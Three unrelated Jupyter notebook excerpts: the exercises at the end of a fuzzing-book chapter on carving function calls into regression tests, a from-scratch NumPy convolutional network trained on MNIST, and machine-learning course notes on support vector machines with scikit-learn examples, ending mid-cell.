Carving was invented by Elbaum et al. \cite{Elbaum2006} and originally implemented for Java. In this chapter, we follow several of their design choices (including recording and serializing method arguments only).
The combination of carving and fuzzing at the API level is described in \cite{Kampmann2018}.
## Exercises
### Exercise 1: Carving for Regression Testing
So far, during carving, we only have looked into reproducing _calls_, but not into actually checking the _results_ of these calls. This is important for _regression testing_ – i.e. checking whether a change to code does not impede existing functionality. We can build this by recording not only _calls_, but also _return values_ – and then later compare whether the same calls result in the same values. This may not work on all occasions; values that depend on time, randomness, or other external factors may be different. Still, for functionality that abstracts from these details, checking that nothing has changed is an important part of testing.
Our aim is to design a class `ResultCarver` that extends `CallCarver` by recording both calls and return values.
In a first step, create a `traceit()` method that also tracks return values by extending the `traceit()` method. The `traceit()` event type is `"return"` and the `arg` parameter is the returned value. Here is a prototype that only prints out the returned values:
```
class ResultCarver(CallCarver):
def traceit(self, frame, event, arg):
if event == "return":
if self._log:
print("Result:", arg)
super().traceit(frame, event, arg)
# Need to return traceit function such that it is invoked for return
# events
return self.traceit
with ResultCarver(log=True) as result_carver:
my_sqrt(2)
```
#### Part 1: Store function results
Extend the above code such that results are _stored_ in a way that associates them with the currently returning function (or method). To this end, you need to keep track of the _current stack of called functions_.
**Solution.** Here's a solution, building on the above:
```
class ResultCarver(CallCarver):
def reset(self):
super().reset()
self._call_stack = []
self._results = {}
def add_result(self, function_name, arguments, result):
key = simple_call_string(function_name, arguments)
self._results[key] = result
def traceit(self, frame, event, arg):
if event == "call":
code = frame.f_code
function_name = code.co_name
qualified_name = get_qualified_name(code)
self._call_stack.append(
(function_name, qualified_name, get_arguments(frame)))
if event == "return":
result = arg
(function_name, qualified_name, arguments) = self._call_stack.pop()
self.add_result(function_name, arguments, result)
if function_name != qualified_name:
self.add_result(qualified_name, arguments, result)
if self._log:
print(
simple_call_string(
function_name,
arguments),
"=",
result)
# Keep on processing current calls
super().traceit(frame, event, arg)
# Need to return traceit function such that it is invoked for return
# events
return self.traceit
with ResultCarver(log=True) as result_carver:
my_sqrt(2)
result_carver._results
```
#### Part 2: Access results
Give it a method `result()` that returns the value recorded for that particular function name and result:
```python
class ResultCarver(CallCarver):
def result(self, function_name, argument):
"""Returns the result recorded for function_name(argument"""
```
**Solution.** This is mostly done in the code for part 1:
```
class ResultCarver(ResultCarver):
def result(self, function_name, argument):
key = simple_call_string(function_name, arguments)
return self._results[key]
```
#### Part 3: Produce assertions
For the functions called during `webbrowser()` execution, create a set of _assertions_ that check whether the result returned is still the same. Test this for `urllib.parse.urlparse()` and `urllib.parse.urlsplit()`.
**Solution.** Not too hard now:
```
with ResultCarver() as webbrowser_result_carver:
webbrowser("http://www.example.com")
for function_name in ["urllib.parse.urlparse", "urllib.parse.urlsplit"]:
for arguments in webbrowser_result_carver.arguments(function_name):
try:
call = call_string(function_name, arguments)
result = webbrowser_result_carver.result(function_name, arguments)
print("assert", call, "==", call_value(result))
except Exception:
continue
```
We can run these assertions:
```
from urllib.parse import SplitResult, ParseResult, urlparse, urlsplit
assert urlparse(
url='http://www.example.com',
scheme='',
allow_fragments=True) == ParseResult(
scheme='http',
netloc='www.example.com',
path='',
params='',
query='',
fragment='')
assert urlsplit(
url='http://www.example.com',
scheme='',
allow_fragments=True) == SplitResult(
scheme='http',
netloc='www.example.com',
path='',
query='',
fragment='')
```
We can now add these carved tests to a _regression test suite_ which would be run after every change to ensure that the functionality of `urlparse()` and `urlsplit()` is not changed.
### Exercise 2: Abstracting Arguments
When mining an API grammar from executions, set up an abstraction scheme to widen the range of arguments to be used during testing. If the values for an argument, all conform to some type `T`. abstract it into `<T>`. For instance, if calls to `foo(1)`, `foo(2)`, `foo(3)` have been seen, the grammar should abstract its calls into `foo(<int>)`, with `<int>` being appropriately defined.
Do this for a number of common types: integers, positive numbers, floating-point numbers, host names, URLs, mail addresses, and more.
**Solution.** Left to the reader.
|
github_jupyter
|
```
# Import Module
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import h5py
# Read data, which has a size of N * 784 and N * 1
MNIST = h5py.File("..\MNISTdata.hdf5",'r')
x_train = np.float32(MNIST['x_train'][:])
x_test = np.float32(MNIST['x_test'][:])
y_train = np.int32(MNIST['y_train'][:,0])
y_test = np.int32(MNIST['y_test'][:,0])
# Reshape samples as 28 * 28 images
x_trainnew = np.reshape(x_train, (len(x_train),28,28))
x_testnew = np.reshape(x_test, (len(x_test),28,28))
# Build activate functions
relu = lambda x: x*(x>0)
# Input a m * n matrix, output a m * n matrix whose rows are transformed and normalized
def softmax(X):
Xexp = np.exp(X)
return Xexp / np.sum(Xexp,axis=1,keepdims=True)
# Initialize the parameters
def param_init(input_size, kernel_size, output_size):
lx = input_size # 2-dim
lk = kernel_size # 2-dim
lh = (lx[0]-lk[0]+1, lx[1]-lk[1]+1) # Hidden layer size, 2-dim
ly = output_size # 1-dim
K = np.random.randn(lk[0],lk[1]) / max(lx)
W = np.random.randn(ly,lh[0],lh[1]) / max(lx)
b = np.zeros(ly)
return K,W,b
K,W,b = param_init((28,28),(3,3),10)
# Build the forward step
# Model: Z = X * K → H = relu(Z) → U = WH + b → Yhat = softmax(U)
def Convolution(image, kernel):
d1,d2 = image.shape
k1,k2 = kernel.shape
output_a = d1 - k1 + 1
output_b = d2 - k2 + 1
conv = np.zeros((output_a,output_b))
for a in range(output_a):
for b in range(output_b):
conv[a,b] = np.sum(np.multiply(image[a:a+k1,b:b+k2], kernel))
return conv
def forward_prop(X,K,W,b):
# Input to Hidden layer
Z = Convolution(X,K) # Shape: (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
H = relu(Z) # Shape: (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
# Hidden layer to Output
U = np.sum(np.multiply(W,H), axis=(1,2)) + b # Shape: (1 * ly)
U.shape = (1,W.shape[0])
Yhat = softmax(U) # Shape: (1 * ly)
return Z, H, Yhat
N = x_trainnew.shape[0]
r = np.random.randint(N)
x_samp = x_trainnew[r,:,:]
Y_oh = np.array(pd.get_dummies(np.squeeze(y_train)))
y_samp = Y_oh[[r]]
Z, H, Yhat = forward_prop(x_samp,K,W,b)
# Build the back-propagation step
def back_prop(K,W,b,Z,H,Yhat,X,Y,alpha):
bDel = Y - Yhat # Length ly
bDel = np.squeeze(bDel)
WDel = np.tensordot(bDel, H, axes=0) # Shape (ly, lx[0]-lk[0]+1, lx[1]-lk[1]+1)
HDel = np.tensordot(bDel, W, axes=1) # Shape (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
ZDel = np.multiply(HDel,(lambda x:(x>0))(Z)) # Shape (lx[0]-lk[0]+1, lx[1]-lk[1]+1)
KDel = Convolution(X,ZDel) # Shape: (lk[0], lk[1])
#KDel = np.zeros(KDel.shape)
#WDel = np.zeros(WDel.shape)
#bDel = np.zeros(bDel.shape)
bn = b + alpha * bDel # Length ly
Wn = W + alpha * WDel # Shape (ly, lx[0]-lk[0]+1, lx[1]-lk[1]+1)
Kn = K + alpha * KDel # Shape (1k[0], lk[1])
return Kn,Wn,bn
alpha = 0.01
bDel,WDel,KDel = back_prop(K,W,b,Z,H,Yhat,x_samp,y_samp,alpha)
# Build the complete Neural Network
def TwoLayer_CNN_train(X, Y, ChannelSize = (3,3), NumChannel = 1, OrigAlpha = 0.01, num_epochs = 10):
# Recode Y as One-Hot
Y_oh = np.array(pd.get_dummies(np.squeeze(Y)))
# Indicate number of units per layer
N = X.shape[0] # Number of samples
xsize = X.shape[1:] # Size of every sample
ksize = ChannelSize # Size of the channel
ysize = Y_oh.shape[1] # Number of classes
# Initialized the parameters
K,W,b = param_init(xsize,ksize,ysize)
# Run 20 train iterations, record the error every time
for epoch in range(num_epochs):
if epoch <= 5:
alpha = OrigAlpha
elif epoch <= 10:
alpha = OrigAlpha * 1e-1
elif epoch <= 15:
alpha = OrigAlpha * 1e-2
else:
alpha = OrigAlpha * 1e-3
total_cor = 0
for n in range(int(N/6)):
r = np.random.randint(N)
x_samp = X[r,:,:]
y_samp = Y_oh[[r]]
# Forward
Z, H, Yhat = forward_prop(x_samp,K,W,b)
pred = np.argmax(Yhat)
if pred==Y[r]:
total_cor += 1
# Backward
K,W,b = back_prop(K,W,b,Z,H,Yhat,x_samp,y_samp,alpha)
print("Training Accuracy: ",total_cor / np.float(N/6))
return K,W,b
K,W,b = TwoLayer_CNN_train(x_trainnew, y_train, OrigAlpha=0.01, num_epochs=10)
# For a given neural network, predict an input X
def predict_NN(X,K,W,b):
X_predprob = forward_prop(X,K,W,b)[2]
X_pred = X_predprob.argmax(axis=1) # Take the biggest probability as its choice
return X_pred
# Predict on test set
# Still has problems!
y_predtest = predict_NN(x_testnew,K,W,b)
np.sum(y_predtest == y_test) / x_testnew.shape[0]
Ut = np.array([1,2,3])
Ut.shape = (1,3)
Wt = np.array([[[1,1],[2,2]],[[3,3],[4,4]],[[5,5],[6,6]]])
Ht = np.array([[0.3,0.3],[0.4,0.4]])
kt = np.sum(np.multiply(Wt,Ht),axis=(1,2))
np.tensordot(Ut,Wt,axes=1)
```
|
github_jupyter
|
```
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import matplotlib
%matplotlib inline
matplotlib.rcParams['figure.figsize'] = (12, 8) # set default figure size, 8in by 6in
```
This week, you will be learning about the support vector machine (SVM) algorithm. SVMs are considered by many to be the most powerful 'black box' learning algorithm, and by posing a cleverly-chosen optimization objective, one of the most widely used learning algorithms today.
# Video W7 01: Optimziation Objective
[YouTube Video Link](https://www.youtube.com/watch?v=r3uBEDCqIN0&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=71)
One way of understanding SVM is that it is a simple modification of logistic regression (just as the logistic regression is
a simple extension of linear regression, and neural networks are a way of extending the concepts of logistic regression, etc.)
Recall that the basic modification we made for logistic regression was to pass our hypothesis through a logistic (or sigmoid)
function. This caused the output from our hypothesis to always be bound to a value in the range from 0.0 to 1.0
$$
h_{\theta}(x) = \frac{1}{1 + e^{-\theta^T x}}
$$
```
def sigmoid(z):
return 1.0 / (1.0 + np.e**-z)
plt.figure()
x = np.linspace(-5.0, 5.0)
z = sigmoid(x)
plt.plot(x, z)
plt.axis([-5, 5, 0, 1])
plt.grid()
plt.xlabel('$z = \\theta^Tx$', fontsize=20)
plt.text(-1, 0.85, '$h_{\\theta}(x) = g(z)$', fontsize=20);
```
Recall that for a single input/output pair $(x, y)$, the objective or cost function for logistic regression has the following form:
$$
-y \;\; \textrm{log} \frac{1}{1 + e^{-\theta^T x}} - (1 - y) \;\; \textrm{log} \; \big(1 - \frac{1}{1 + e^{-\theta^T x}}\big)
$$
This expression will only involve either the left or right side, depending on whether $y = 1$ or $y = 0$ (recall that in logistic
regression, we are performming a classification, where each training example is either in the class, or it is not in the class).
So for example, if we want $y = 1$, then we want $\theta^Tx \gg 0$. The curve for the function when $y = 1$ looks like the
following:
```
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 / (1.0 + np.exp(-z)) )
plt.figure()
plt.plot(z, y)
plt.xlabel('$z$', fontsize=20)
plt.grid()
plt.text(1, 3, '$-log \\; \\frac{1}{1 + e^{-z}}$', fontsize=20);
```
Likewise, for the case where $y = 0$ then we want $\theta^T x \ll 0$. The curve for the objective function when $y = 0$ similarly
looks like the following:
```
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 - (1.0 / (1.0 + np.exp(-z))) )
plt.figure()
plt.plot(z, y)
plt.xlabel('$z$', fontsize=20)
plt.grid()
plt.text(-3, 3, '$-log \\; ( 1 - \\frac{1}{1 + e^{-z}} )$', fontsize=20);
```
The full cost function we were trying to minimize, then, for logistic regression was:
$$
\frac{1}{m} \big[ \sum_{i=1}^{m} y^{(i)} \big( - \textrm{log} \; h_{\theta}(x^{(i)} \big) +
(1 - y^{(i)}) \big( - \textrm{log} \; (1 - h_{\theta}(x^{(i)})) \big) \big] + \frac{\lambda}{2m} \sum_{j=1}^{n} \theta_j^2
$$
For the support vector machine, we change the terms relating to the hypothesis to functions $\textrm{cost}_1$ and
$\textrm{cost}_0$:
$$
\frac{1}{m} \big[ \sum_{i=1}^{m} y^{(i)} \; \textrm{cost}_1( \theta^{T} x^{(i)} )
+ (1 - y^{(i)}) \; \textrm{cost}_0 ( \theta^{T} x^{(i)} ) \big]
+ \frac{\lambda}{2m} \sum_{j=1}^{n} \theta_j^2
$$
as described in the video, by convention in SVM we remove the division by $m$ and we parameterize the regularization and cost
terms a bit differently. Usually you will see the objective function for SVM specified in this slightly different but equivalent
form:
$$
\underset{\theta}{\textrm{min}} \; C
\sum_{i=1}^{m} \big[ y^{(i)} \; \textrm{cost}_1( \theta^{T} x^{(i)} )
+ (1 - y^{(i)}) \; \textrm{cost}_0 ( \theta^{T} x^{(i)} ) \big]
+ \frac{1}{2} \sum_{j=1}^{n} \theta_j^2
$$
In this formulation of the objective function, the term C is being used as the regularization parameter. But now, the larger
the value of C, the more emphasis that is placed on the cost terms (and the less that is placed on the regularization terms.
# Video W7 02: Large Margin Intuition
[YouTube Video Link](https://www.youtube.com/watch?v=yjH3ZSPqLhU&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=72)
Because of the form of the $\textrm{cost}_0$ and $\textrm{cost}_1$ functions (which we haven't specified yet), these
naturally favor cost functions that give wide margins between the hypothesis outputs for $y=0$ and $y=1$.
Intiutively, as shown in the video, the objective function that we have defined will find decision boundaries that maximize
the margin between the negative and positive examples. This is where the name large margin classifier comes from. The
term `support vector` from the name for SVM also refers to the mathematical properties of these objective functions that
try and maximize this margin between positive and negative examples.
The $cost_0$ and $cost_1$ functions described in the video are basically the same idea of using
what are known as rectified linear units (ReLU) in neural network. Here we give a linear
activation response when the value is above (or below) some threshold, and 0 otherwise.
The following figures compare a possible implementation of the discussed $cost_0$ and $cost_1$ functions
to this type of threshold RELU activation function.
```
def cost_0(z):
return np.where(z > -1, z+1, 0)
def cost_1(z):
return np.where(z < 1, -z+1, 0)
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 / (1.0 + np.exp(-z)) )
# logistic cost function, for y=1
plt.figure()
plt.plot(z, y, label='logistic cost function $y=1$')
plt.xlabel('$z$', fontsize=20)
plt.grid()
# cost_1 function, RELU like
y = cost_1(z)
plt.plot(z, y, label='$cost_1$ RELU approximation for SVM')
plt.legend();
z = np.linspace(-3.0, 3.0)
y = -np.log( 1.0 - (1.0 / (1.0 + np.exp(-z))) )
# logistic cost function, for y=0
plt.figure()
plt.plot(z, y, label='logistic cost function $y=0$')
plt.xlabel('$z$', fontsize=20)
plt.grid()
# cost_1 function, RELU like
y = cost_0(z)
plt.plot(z, y, label='$cost_0$ RELU approximation for SVM')
plt.legend();
```
# Video W7 03: Mathematics Behind Large Margin Intuition (Optional)
[YouTube Video Link](https://www.youtube.com/watch?v=Jm49m7ey34o&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=73)
The nitty gritty of the mathematics behind how the SVM optimization finds large margin decision boundaries is not necessary
for using SVM well. But at least watch the video to get a bit of a feel for what happens behind the scenes when creating an SVM
and how it finds such decision boundaries given our definition of the cost function.
# Video W7 04: Kernels I
[YouTube Video Link](https://www.youtube.com/watch?v=0Fg2U6LN3pg&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=74)
This video starts by giving a good explanation of what are known as gaussian feature kernels. When we looked at logistic
regression, we did examine using nonlinear features to produce more complex decision boundaries. Kernel methods, used
most commonly with SVM systems, allow us to create sets of nonlinear features, but in a more directed and less random way
than simply using polynomial combinations of basic features.
The [gaussian function](https://en.wikipedia.org/wiki/Gaussian_function) discussed in the video is related to gaussian
or normal distributions that you may be familiar with (e.g. the standard 'bell curve' distribution). For a single
feature, the gaussian function is usually specified in terms of $\mu$, the mean or location of the feature, and
$\sigma^2$ the square of the deviation of the feature. So for example, as given in the video, we can think of
the similarity measure for a system that has a single feature, with a landmar at the point $\mu = 0$ as follows:
$$
f(x) = exp \Big(- \frac{(x - \mu)^2}{2\sigma^2} \Big)
$$
The expression $(x - \mu)^2$ is really just an expression of the distance from some input $x$ to the landmark. So when
when we only have a single feature, and our landmark is at the origin point 0 (e.g. $\mu = 0$) then we have:
```
def gauss(x, mu, sigma):
return np.exp(- (x - mu)**2.0 / (2 * sigma**2.0))
x = np.linspace(-3.0, 3.0)
plt.figure()
plt.plot(x, gauss(x, 0.0, 1.0), 'k-')
plt.xlabel('$x_1$', fontsize=20)
plt.ylabel('gaussian similarity function');
```
This is the basic gaussian distribution, with a mean of 0 and a standard deviation of 1. In the context of a gaussian kernel
function, we will return a similarity of 1.0 for any feature that is exactly the same as our landmark ($\mu$ or 0 in this case),
and we will return lesser values, eventually approaching 0, as we get a further distance from the landmark $\mu$ location of 0.
In the videos, the linear algebra norm simply calculates the distance from an input $x$ when we have more than 1 feature. So for
example, when we have 2 features, or 2 dimensional space, we need to visualize the gaussian function using a 3 dimensional plot,
where we plot our two features $x_1$ and $x_2$ on two orthogonal axis, and plot the gaussian function on the 3rd orthogonal
z axis.
So for example, as shown in the video, if we have 2 features, and our landmark is located at the position where $x_1 = 3$
and $x_2 = 5$, e.g.
$$
l^{(1)} =
\begin{bmatrix}
3 \\
5 \\
\end{bmatrix}
$$
We will simply have a gaussian function in 2 dimensions (features) that has a value of 1.0 exactly at that $\mu$ location (in
2 dimensions), and falls away in the bell curve shape in both dimensions as a function of the $\sigma$ (the deviation value).
So the gaussian similiarity function written in the video is:
$$
f_1 = \mathrm{exp} \Big(- \frac{ \|x - l^{(1)}\|^2 }{2 \sigma^2} \Big)
$$
The top part of the fraction is simply calculating the distance between some point $x$ and the landmark location in a 2 or higher
dimensional space (e.g. the sum of all of the differences for each individual dimension, then squaring this sum, in
linear algebra this is simply the square of the norm of the difference of these two vectors). So for a two dimensional feature, the gaussian function can
be plotted on a 3D plot in python as follows:
```
# first plot as a contour map
def gauss(x, mu, sigma):
"""A multi-dimensional version of the gaussian function. x and mu are n dimensional feature vectors, so
we take the linear algebra norm of the difference and square this)."""
from numpy.linalg import norm
return np.exp(- norm(x - mu, axis=1)**2.0 / (2 * sigma**2.0))
# the landmark, I have been calling it mu
mu = np.array([3, 5])
sigma = 1.0
# we create a mesh so we can plot our gaussin function in 3d
x1_min, x1_max = -2.0, 8.0
x2_min, x2_max = 0.0, 10.0
h = 0.02 # step size in the mesh
x1, x2 = np.meshgrid(np.arange(x1_min, x1_max, h),
np.arange(x2_min, x2_max, h))
x = np.c_[x1.ravel(), x2.ravel()]
Z = gauss(x, mu, sigma)
Z = Z.reshape(x1.shape)
# plot the 2 feature dimensional gaussian as a contour map
plt.contourf(x1, x2, Z, cmap=plt.cm.jet, alpha=0.8)
plt.colorbar()
plt.xlabel('$x_1$', fontsize=20)
plt.ylabel('$x_2$', fontsize=20);
# now plot as as a 3D surface plot
from mpl_toolkits.mplot3d import Axes3D
Z = Z.reshape(x1.shape)
fig = plt.figure(figsize=(12,12))
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x1, x2, Z, cmap=plt.cm.jet)
ax.set_xlabel('$x_1$', fontsize=20)
ax.set_ylabel('$x_2$', fontsize=20);
```
You should try changing the landmark location $\mu$ and the sigma value (which controls how fast the change in distance affects
the value of the gaussian function) in the previous cell.
As shown in the video (closer to the end), gaussian kernels allow for nonlinear decision boundaries. But unlike creating
an (exponential) combination of polynomial fetures, we can simply pick an appropriate number of gausian kernels that will
likely produce a good enough decision boundary for our given set of data. As discussed in this video, a good way
of thinking of the gaussian kernels is as landmarks that are chosen (we discuss how to choose the landmarks in the next video)
and features are then simply similarity measures to the chosen set of landmarks.
# Video W7 05: Kernels II
[YouTube Video Link](https://www.youtube.com/watch?v=P9Xjvr2JfOk&index=75&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW)
In practice, landmarks for gaussian kernels are chosen by putting landmarks at each of the training example locations.
Thus the number of landmarks will grow linearly with the size of our training set data (instead of being a combinatorial
explosion in terms of the number of input features, as creating polynomial terms from the features tends to do).
# Video W7 06: Using an SVM
[YouTube Video Link](https://www.youtube.com/watch?v=wtno4WSDTlY&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=76)
This video shows using SVM packages for octave/matlab. In this class we have been using Python, of course. There are many good
implementations of SVM in Python. For example, the libsvm mentioned in the video is actually a language neutral implementation
of svm, and there are extensions available to use libsvm in python:
[libsvm](https://www.csie.ntu.edu.tw/~cjlin/libsvm/)
As of the creation of this notebook, however (Fall 2015), I do recommend using the svm implementation
in the scikit learn library. It is the most mature and has the best (most consistent) user interface. You will have to install
scikit learn in your environment in order to use it. If you are using the enthought Python environemnt, it should have been
installed for you. The documentation for the scikit learn svm library is [here](http://scikit-learn.org/stable/modules/svm.html).
As discussed in this video, sometimes we want to do an SVM classification, but not ues any complex kernels, e.g. a
straightforward linear SVM classifier. If you want to do this, you should use the `SVC` in scikit learn with a linear kernel to
do a linear SVM classifier. For example, recall that in assignment 03 we used logistic regression to classify
exam score data (with a single class, admit or not admit) using a linear decision boundary. The data looked like this:
```
data = pd.read_csv('../../data/assg-03-data.csv', names=['exam1', 'exam2', 'admitted'])
x = data[['exam1', 'exam2']].values
y = data.admitted.values
m = y.size
print((x.shape))
print((y.shape))
print(m)
X = np.ones( (3, m) )
X[1:,:] = x.T # the second column contains the raw inputs
X = X.T
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend();
```
Before we do a linear SVM, lets use the logistic regression functions from scikit learn to perform a logistic regression. The
scikit learn uses C rather than the $\lambda$ to specify the amount of regularization. In our assignment we didn't use any regularization. We can get similar theta parameters by using a large C, which will do the optimization using only the cost, without
much weight for the regularization. But try it with more regularization (e.g. smaller C values), and you will see that the
decision boundary is still basically the same.
```
from sklearn import linear_model
logreg = linear_model.LogisticRegression(C=1e6, solver='lbfgs')
logreg.fit(x, y)
print((logreg.coef_)) # show the coefficients that were fitted to the data by logistic regression
print((logreg.intercept_))
```
Notice that for scikit learn we don't have to add in the column of 1's to the input data. By default, most scikit learn functions
will assume they need to add in such an intercept parameter. So there will only be two theta parameters in this case, but the
parameter corresponding to the intercept value is in a separate constant after we fit our model to the training data.
Here is a plot of the decision boundary that was found.
```
# display the decision boundary for the coeficients
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
# visualize the data points of the two categories
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
# add the decision boundary line
dec_xpts = np.arange(30, 93)
theta = logreg.coef_[0]
dec_ypts = - (logreg.intercept_ + theta[0] * dec_xpts) / theta[1]
plt.plot(dec_xpts, dec_ypts, 'b-');
```
Now lets use the linear SVM classifier from scikit learn to perform the same classification.
```
from sklearn import svm
linclf = svm.SVC(kernel='linear', C=1e6)
linclf.fit(x, y)
print((linclf.coef_)) # show the coefficients that were fitted to the data by logistic regression
print((linclf.intercept_))
```
Notice that the parameters found for the model andthe intercept are a bit different, but these do actually correspond to basically
about the same decision boundary as before. If we plot it you can see this is the case:
```
# display the decision boundary for the coeficients
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
# visualize the data points of the two categories
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
# add the decision boundary line
dec_xpts = np.arange(30, 93)
theta = linclf.coef_[0]
dec_ypts = - (linclf.intercept_ + theta[0] * dec_xpts) / theta[1]
plt.plot(dec_xpts, dec_ypts, 'b-');
```
And finally, lets use an SVM with a gaussian kernel. It is not so interesting to use a nonlinear classifier with the
previous data, so lets make up some data, similar to the data shown in our companion video
of a class surrounded by another class. Here we use a function from the scikit learn library that can beused to creat data
at random. The data has 2 features, and only 2 classes (either positivie or negative, e.g. admitted or not
admitted). The random data generated from this function is centered at the origin (0, 0). The further away the data is from
the center, the more probable it is in another class (using a gaussian probability function). Thus with two classes we tend to get
a class inside surrounded by another class, with a basically circular decision boundary.
```
from sklearn.datasets import make_gaussian_quantiles
X, Y = make_gaussian_quantiles(n_features=2, n_classes=2)
neg_indexes = np.where(Y==0)[0]
pos_indexes = np.where(Y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative examples')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive examples');
```
Here then we will use a SVM with gaussian kernels to create a classifier for the data. Note that we specify 'rbf' for the
kernel, these are radial basis functions kernels. Radial basis function kernels include
gaussian functions, as well as the polynomial functions
discussed in our companion videos. You specify the gamma, degree and coef0 parameters to get the different types of kernel
functions that were discussed. I believe that by specifying a gamma of 1.0 we will be using simple gaussian kernel functions as
were shown in our videos.
```
from sklearn import svm
rbfclf = svm.SVC(kernel='rbf', gamma=1.0)
rbfclf.fit(X, Y)
# Now display the results. We don't really have simple theta parameters anymore, the parameters are specifying
# relative values of the gaussian kernels now. In fact, rbclf.coef_ will not be defined for non linear kernels.
# Here we use an alternative method to visualize the decision boundary that was discovered.
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = rbfclf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(Y==0)[0]
pos_indexes = np.where(Y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative examples')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive examples')
plt.legend();
```
# More SciKit-Learn Examples
## Linear SVC on iris dataset
Use a LinearSVC (non-kernel) based SVM. LinearSVC will be much faster than using SVC and specifying a 'linear'
kernel.
```
from sklearn import datasets
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
iris = datasets.load_iris()
X = iris['data'][:, (2, 3)] # petal length, petal width
y = (iris['target'] == 2).astype(np.float64) # Iris-virginica
C = 1.0
svmclf = Pipeline((
("scaler", StandardScaler()),
("linear_svc", LinearSVC(C=C, loss='hinge')),
))
svmclf.fit(X, y)
svmclf.predict([[5.5, 1.7]])
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = svmclf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='other')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='Iris-virginica')
plt.legend();
plt.title('C = %f' % C)
```
## Moon data using Generated Polynomial Features
Example using the PolynomialFeatures class to create all feature combinations up to degree 3 polynomials here.
```
from sklearn.datasets import make_moons
from sklearn.preprocessing import PolynomialFeatures
X, y = make_moons(noise=0.1)
d = 3 # polynomial degree
C = 10
polynomial_svm_clf = Pipeline((
('poly_features', PolynomialFeatures(degree=d)),
('scaler', StandardScaler()),
('svm_clf', LinearSVC(C=C, loss='hinge')),
))
polynomial_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = polynomial_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, degree=%d' % (C, d))
```
## Polynimial Kernel
```
from sklearn.svm import SVC
d = 10
c0 = 100
C = 5
poly_kernel_svm_clf = Pipeline((
('scalar', StandardScaler()),
('svm_clf', SVC(kernel='poly', degree=d, coef0=c0, C=C)),
))
poly_kernel_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = poly_kernel_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
